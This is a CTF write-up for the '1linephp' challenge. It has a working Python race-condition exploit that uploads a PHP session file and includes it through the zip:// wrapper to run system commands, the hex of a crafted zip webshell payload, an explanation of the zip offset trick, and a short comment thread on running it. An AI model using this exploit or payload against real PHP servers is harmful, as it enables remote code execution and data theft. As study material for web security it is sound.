1linephp

ex.py

import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool

HOST = "http://111.186.59.2:50082/"

headers = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=12'
}
payload = open('./s.zip','rb').read()

def runner1(i):

    url = "http://111.186.59.2:50082/"
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload
    }
    while 1:
        fp = open('/etc/passwd', 'rb')
        r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
        fp.close()

def runner2(i):
    filename = '/tmp/sess_12%23s&a=system&b=cat%20/dd810fc36330c200a_flag/flag'
    filename = f'zip://%s' % filename
    # print filename
    while 1:
        url = '%s?yxxx=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.text
        if c and 'yxxx' not in c:
            print(c)

if sys.argv[1] == '1':
    runner = runner1
else:
    runner = runner2

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)

s.zip(hexcode)

504B0304140000000800F43AE552DBE0973D1E0000002200000005000000732E70687073B0B12FC82850508977770D89564F548FD5803293D46335ADEDED78B900504B01021400140000000800F43AE552DBE0973D1E00000022000000050024000000000000002000000010000000732E7068700A002000000000000100180015FE683C2371D70115FE683C2371D701C5B2593C2371D701504B0506000000000100010057000000510000000000

writeup.md

Description

http://111.186.59.2:50080
http://111.186.59.2:50081
http://111.186.59.2:50082
The three servers are the same, you can choose any one. server will be reset every 10 minutes.

this chall is almost same https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html.

<?php
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');

but some code is different, we need to find new exploit

We can upload arbitrary session file using PHP_SESSION_UPLOAD_PROGRESS and include session file using various wrapper. But in this chall, we need to bypass .php, so we can imagine 2 ways for bypass.

1. phar wrapper
2. zip wrapper

First i use phar wrapper. but it's impossible! https://stackoverflow.com/questions/59302726/include-php-phar-without-phar-extension Then, Maybe we can use second way for exploit.

https://github.com/p4-team/ctf/tree/master/2016-04-15-plaid-ctf/web_pixelshop by accident, i found this writeup and it has very useful information.

zip file is not required for starting with PK signature. If we define proper offset for the zip file, there is no need to start with zip file signature at start of file. And we can simply calculate the ZIP offsets by hand!

we need to change two offset in zip. just change Local Header Offset in Central Directory File Header and Central Header Offset in End of Central Directory Record.

These offsets specify the starting location of the header of the zip file. So we can unzip our payload independent of session prefix.

On server session.upload_progress.cleanup is enable. so we need to using race condition.

then we can get flag!

Thank you so much for more details! But how could I run the exploit? I tried to run "python3 ex.py 1" and "pytho3 ex.py 2" in two different terminals. And what I got was this response from "python3 ex.py 2". But not flag. Further guidance would be greatly appreciated!

<br />
<b>Warning</b>:  include(zip:///tmp/sess_12#s.php): failed to open stream: operation failed in <b>/var/www/html/index.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'zip:///tmp/sess_12#s.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/var/www/html/index.php</b> on line <b>2</b><br />

Just waiting..!
Because Exploit uses race conditions, you have to wait for the right timing.

I got it. Thank you!